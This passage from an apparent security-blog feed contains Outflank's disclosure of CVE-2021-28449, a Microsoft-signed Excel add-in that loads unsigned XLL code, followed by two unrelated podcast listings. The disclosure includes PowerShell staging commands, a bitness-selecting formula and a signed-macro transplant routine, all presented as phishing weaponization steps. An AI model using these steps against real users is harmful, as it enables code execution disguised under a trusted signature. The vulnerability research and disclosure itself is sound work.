    MsgBox (XLLNotFoundErr)
    ThisWorkbook.Close (False)
End Sub

RegisterXLL will load any XLL without warning / user validation. Copying the XLAM to another folder and adding a (malicious) XLL named ANALYS32.XLL in the same folder allows for unsigned code execution from a signed context.

There are no integrity checks on loading additional (unsigned) resources from a user-accepted (signed) context.

Practical weaponization and handling different MS Office installs

For full weaponization, an attacker needs to supply the correct XLL (32 vs 64 bit) as well as a method to deliver multiple files, both the Excel file and the XLLs. How can we solve this?

Simple weaponization

The simplest version of this attack can be weaponized once an attacker can deliver multiple files: an Excel file and the XLL payload. This can be achieved via multiple vectors, e.g. offering multiple files for download or using container formats such as .zip, .cab or .iso.

In the easiest form, the attacker would copy the ATPVBAEN.XLAM from the Office directory and serve a malicious XLL, named ANALYS32.XLL next to it. The XLAM can be renamed according to the phishing scenario. By changing the XLLName Cell in the XLAM, it is possible to change the XLL name to an arbitrary value as well.
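
A minimal staging sketch of this simplest form, assuming you already have a payload XLL (all file names are hypothetical):

# Stage the signed add-in next to a malicious XLL with the expected name
Copy-Item 'C:\Program Files\Microsoft Office\root\Office16\Library\Analysis\ATPVBAEN.XLAM' .\Invoice.xlam
Copy-Item .\payload_x64.dll .\ANALYS32.XLL
Compress-Archive -Path .\Invoice.xlam, .\ANALYS32.XLL -DestinationPath .\bundle.zip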

MS Office x86 vs x64 bitness – Referencing the correct x86 and x64 XLLs (PoC 1)

For a full weaponization, an attacker would require knowledge on whether 64-bit or 32-bit versions of MS Office are used at a victim. This is required because an XLL payload (DLL) works for either x64 or x86.

It is possible to obtain the Office bitness using =INFO("OSVERSION"), since the function is executed when the worksheet is opened, before the VBA macro code is executed. For clarification, the resulting version string includes the version of Windows and the bitness of Office, e.g. "Windows (32-bit) NT 10.00". An attacker can provide both 32- and 64-bit XLLs and use Excel formulas to load the correct XLL version.

The final bundle to be delivered to the target would contain:

PoC-1-local.zip
├── Loader.xlam
├── demo64.dat
└── demo32.dat

A 64-bit XLL is renamed to demo64.dat and is loaded from the same folder. It can be served as zip, iso, cab, double download, etc.

Payload: Changed XLLName cell B8 to
= "demo" & IF(ISERROR(SEARCH("64";INFO("OSVERSION"))); "32"; "64") & ".dat"

Loading the XLL via WebDAV

With various Office trickery, we also created a version where the XLAM/XLSM could be sent directly via email and would load the XLL via WebDAV. Details of this are beyond the scope of this blog, but there are quite a few tricks to enable the WebDAV client on a target's machine via MS Office (more on that in part 2 of this series).

Signed macro transposing to different file formats

By copying the vbaProject.bin, signed VBA code can be copied/transposed into other file formats and extensions (e.g. from XLAM to XLSM to XLS).

Similarly, changing the file extension from XLAM to XLSM can be performed by changing one word inside the document in [Content_Types].xml from ‘addin’ to ‘sheet’. The Save As menu option can be used to convert the XLSM (Open XML) to XLS (compound file).
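
A rough sketch of this transposing step using .NET's zip classes from PowerShell (file names are hypothetical, and the target phish.xlsm is assumed to already contain a VBA project so that the xl/vbaProject.bin entry exists):

Add-Type -AssemblyName System.IO.Compression.FileSystem

# Copy the signed VBA project from the Microsoft XLAM into our own XLSM
$src = [System.IO.Compression.ZipFile]::OpenRead("$pwd\ATPVBAEN.XLAM")
$dst = [System.IO.Compression.ZipFile]::Open("$pwd\phish.xlsm", 'Update')

$in  = $src.GetEntry('xl/vbaProject.bin').Open()
$out = $dst.GetEntry('xl/vbaProject.bin').Open()
$out.SetLength(0)        # truncate the existing entry
$in.CopyTo($out)         # overwrite it with the signed vbaProject.bin

$in.Dispose(); $out.Dispose(); $src.Dispose(); $dst.Dispose()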

Signature details

Some noteworthy aspects of the signature that is applied on the VBA code:

  • The VBA code in the XLAM files is signed by Microsoft using timestamp signing which causes the certificate and signature to remain valid, even after certificate expiration. As far as we know, timestamp signed documents for MS Office cannot be revoked.
  • The XLAMs located in the office installer are signed by CN = Microsoft Code Signing PCA 2011 with varying validity start and end dates. It appears that Microsoft uses a new certificate every half year, so there are multiple versions of this certificate in use.
  • In various real-world implementations at our clients, we have seen the Microsoft Code Signing PCA 2011 installed as a Trusted Publisher. Some online resources hint towards adding this Microsoft root as a trusted publisher. This means code execution without a popup after opening the maldoc.
  • In case an environment does not have the Microsoft certificate as trusted publisher, then the user will be presented with a macro warning. The user can inspect the signature details and will observe that this is a genuine Microsoft signed file.

Impact summary

An attacker can transpose the signed code into various other formats (e.g. XLS, XLSM) and use it as a phishing vector.

In case a victim system has marked the Microsoft certificate as trusted publisher and the attacker manages to target the correct certificate version, a victim will get no notification and attacker code is executed.

In case the certificate is not trusted, the user will get a notification and might enable the macro as it is legitimately signed by Microsoft.

Scope: Windows & Mac?

Affected products: confirmed on all recent versions of Microsoft Excel (2013, 2016, 2019), for both x86 and x64 architectures. We have found signed and vulnerable ATPVBAEN.XLAM files dating back to 2009, and the file contains references to "Copyright 1991,1993 Microsoft Corporation", hinting that this vulnerability may have been present for a very long time.

It is noteworthy to mention that the XLAM add-in that we found supports paths for both Windows and MacOS and launches the correct XLL payload accordingly. Although MacOS is likely affected, it has not been explicitly tested by us. Theoretically, the sandbox should mitigate (part of) the impact. Have fun exploring this yourself; previous ports of our MS Office research to the Mac world by other researchers have had quite some impact. 😉

Microsoft’s mitigation

Microsoft acknowledged the vulnerability, assigned it CVE-2021-28449 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28449) and patched it 5 months later.

Mitigation of this vulnerability was not trivial, due to other weaknesses in these files (see the upcoming blog post 2 of this series). The weakness described in this post has been mitigated by signing the XLL and adding a new check that prevents 'downgrading' and loading of an unsigned XLL. By default, downgrading is not allowed, but this behavior can be manipulated via the registry value SkipSignatureCheckForUnsafeXLL as described in https://support.microsoft.com/en-gb/office/add-ins-and-vba-macros-disabled-20e11f79-6a41-4252-b54e-09a76cdf5101.

Disclosure timeline

Submitted to MSRC: 30 November 2020

Patch release: April 2021

Public disclosure: December 2021

Acknowledgement: Pieter Ceelen & Dima van de Wouw (Outflank)

Next blog: Other vulnerabilities and why the patch was more complex

The next blog post of this series will explain other vulnerabilities in the same code, show alternative weaponization methods and explain why the patch for CVE-2021-28449 was a complex one.

The post A phishing document signed by Microsoft – part 1 appeared first on Outflank.

How to work in cloud security | Guest Menachem Shafran

By: Infosec
13 December 2021 at 08:00

On today’s podcast, Menachem Shafran of XM Cyber talks about cloud security. Menachem tells us about the work of a project manager and product manager, how the haste to migrate to the cloud can unnecessarily leave vulnerabilities wide open and why a cloud security expert also needs to be a good storyteller.

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro 
2:40 - Getting into cybersecurity
5:47 - Project manager in cybersecurity
9:12 - Identifying pain points
10:24 - Working as a VP of product
14:09 - Data breaches
16:30 - Critical versus non-critical data breaches
18:19 - Attacker’s market 
19:38 - How do we secure the cloud?
22:45 - A safer cycle of teams
24:40 - How to implement cybersecurity changes
28:50 - How to work in cloud security
30:48 - A good cloud security resume 
33:02 - Work from home and cloud security
34:30 - XM Cyber’s services 
37:21 - Learn more about Menachem
38:00 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾

High-tech hacking tools and how to defend against them | Guest Bentsi Ben-Atar

By: Infosec
20 December 2021 at 08:00

Bentsi Ben-Atar of Sepio Systems talks about some truly scary high-tech hacking weapons and techniques, from Raspberry Pis in your mouse or keyboard to charging cables that can exfiltrate data from a mile away. What do we do? How do we prepare?

– Start learning cybersecurity for free: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

0:00 - Intro 
3:18 - Getting into cybersecurity
4:30 - Career highlights 
5:50 - Co-founding two companies 
7:22 - Typical work day at CTO and CMO
11:29 - New stealthy hacking tools
13:08 - Hacking a smart copy machine
17:46 - Stealing data with a Raspberry Pi
26:01 - The ninja cable 
32:11 - Security awareness while traveling 
35:20 - How to work battling high-tech cybercrime
36:35 - Exploring cybersecurity 
37:47 - More about Bentsi’s companies
39:31 - Find more about Bentsi 
39:57 - Outro

About Infosec
Infosec believes knowledge is power when fighting cybercrime. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and privacy training to stay cyber-safe at work and home. It’s our mission to equip all organizations and individuals with the know-how and confidence to outsmart cybercrime. Learn more at infosecinstitute.com.

💾
